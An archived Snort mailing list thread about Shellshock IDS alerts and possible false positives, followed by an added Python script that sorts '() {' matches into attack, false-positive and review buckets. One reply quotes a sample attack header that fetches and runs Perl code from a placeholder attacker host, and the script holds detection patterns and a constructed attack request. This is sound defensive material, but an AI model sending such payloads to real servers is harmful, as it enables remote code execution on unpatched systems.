Snort mailing list archives
Re: ShellShock Signatures
From: "Joel Esler (jesler)" <jesler () cisco com>
Date: Tue, 3 Mar 2015 16:57:31 +0000
We made a blog post back when this came out on the details of the vulnerability here: http://vrt-blog.snort.org/2014/09/shellshock-update-bash-immediately.html

--
Joel Esler
Open Source Manager
Threat Intelligence Team Lead
Talos Group

On Mar 3, 2015, at 11:37 AM, s0ups . <ynots0ups () gmail com> wrote:

On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards () gmail com> wrote:

Hello Snort Users,

I'm a new list member, and happy to say that I've been working with Firesight and a couple of ASA-X Firepower modules for almost a week now. This is my first time hands-on w/ an IPS/IDS.

I'm here because I found this message from this list while researching an alert: http://sourceforge.net/p/snort/mailman/message/32980285/

I had a user viewing a newspaper's website today, and I received an alert for 1:31977. I actually wasn't familiar with the domain name, and just searching for the domain I saw in the alert in Google also generated an alert from my workstation (I assume something to do with Google pulling news/images to display in the results?). The URI from the request does have "() {" in it, so that's why it was triggered, but I don't know if it's a False Positive alert. The website was for the Sacramento Bee (www.sacbee.com). I can provide more detail from the pcap / URI when I'm back in the office tomorrow.

While I'm introducing myself as a snort newbie... If anyone has any recommendations for other resources or reading material, feel free to message me off-list.

Cheers,
Colin Edwards
CISSP, GCIH, GCWN, GSEC, MCSE

Yo Colin,

As you probably know, Shellshock attacks attempt to exploit environment variables that use user-provided data. The attacks are pretty easy to identify as they usually have some recognizable commands after the "() { :;};".

I've actually hardly, if ever, seen 1:31977 in my environment, as the majority of the legit hits I see target HTTP header fields (so 1:31978 is more common), like so:

GET /cgi-bin/possiblevulnerablescript.cgi
User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://attackerwebsite/maliciousperlcode;perl maliciousperlcode

FireEye has a good explanation and illustration of the various attack methods seen for the Shellshock vulnerability, which will give you a good idea of what the common attacks look like. (https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html)

Chances are if it's an HTTP response from an external webserver to a client browser then it's a FP and poses little to no threat.

I'd be interested in checking out the URI if you want to send it to me.

- s0ups

------------------------------------------------------------------------------
Dive into the World of Parallel Programming The Go Parallel Website, sponsored by Intel and developed in partnership with Slashdot Media, is your hub for all things parallel software development, from weekly thought leadership blogs to news, videos, case studies, tutorials and more. Take a look and join the conversation now. http://goparallel.sourceforge.net/
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users
Please visit http://blog.snort.org to stay current on all the latest Snort news!
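A small triage script for the two SIDs discussed in the thread, added here as an example (it is not from the thread or from the Snort project): it searches the request URI (the buffer 1:31977 inspects) and the header fields (the buffer 1:31978 inspects) for the "() {" prefix, then applies the two heuristics s0ups gives, a command after the function body marks an exploit attempt and a match in a server-to-client response is a likely false positive. The sample messages, the SID-to-buffer labels and the regexes are constructed assumptions, not Snort's actual rule logic.

```python
import re
from urllib.parse import unquote

# Bash function-definition prefix every Shellshock payload starts with;
# whitespace around the braces varies, so allow any amount.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Exploits put ';' and a command after the function body, e.g. "() { :;}; /bin/bash".
# A JavaScript callback like "function() { return 1; }" has nothing after its brace.
COMMAND_AFTER_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*\S+")

# Constructed samples (not from the thread): a header-borne attack shaped
# like the one s0ups quoted, and a benign JS callback in a query string.
ATTACK_REQUEST = ("GET /cgi-bin/status.cgi HTTP/1.1\r\nHost: example.test\r\n"
                  "User-Agent: () { :;}; /bin/bash -c \"cd /var/tmp\"\r\n\r\n")
BENIGN_REQUEST = ("GET /widget?cb=function()%20{%20return%201;%20} HTTP/1.1\r\n"
                  "Host: news.example.test\r\n\r\n")


def parse_http(raw):
    """Split an HTTP request or response into (start_line, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify(raw):
    """List (location, verdict) pairs for every '() {' match in one message.
    The location names the SID from the thread that inspects that buffer."""
    start_line, headers, body = parse_http(raw)
    is_response = start_line.startswith("HTTP/")
    candidates = {"body": body}
    if not is_response:
        # 1:31977 matches the normalized (percent-decoded) URI, so decode first.
        candidates["uri (1:31977)"] = unquote(start_line.split(" ")[1])
    for name, value in headers.items():
        candidates["header %s (1:31978)" % name] = value  # 1:31978 buffer
    findings = []
    for where, text in candidates.items():
        if not SHELLSHOCK_RE.search(text):
            continue
        if is_response:
            verdict = "likely false positive: server-to-client traffic"
        elif COMMAND_AFTER_RE.search(text):
            verdict = "exploit attempt: command follows the function body"
        else:
            verdict = "needs review: pattern without a trailing command"
        findings.append((where, verdict))
    return findings
```

Feeding the script a pcap-extracted request such as the one Colin describes would put the URI match in the "needs review" bucket, which is the case the thread says to inspect by hand.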
Current thread:
- ShellShock Signatures Colin Edwards (Mar 02)
- Re: ShellShock Signatures s0ups . (Mar 03)
- Re: ShellShock Signatures Joel Esler (jesler) (Mar 03)
- Re: ShellShock Signatures Colin Edwards (Mar 05)
- Re: ShellShock Signatures Joel Esler (jesler) (Mar 05)
- Re: ShellShock Signatures Joel Esler (jesler) (Mar 03)
- Re: ShellShock Signatures s0ups . (Mar 03)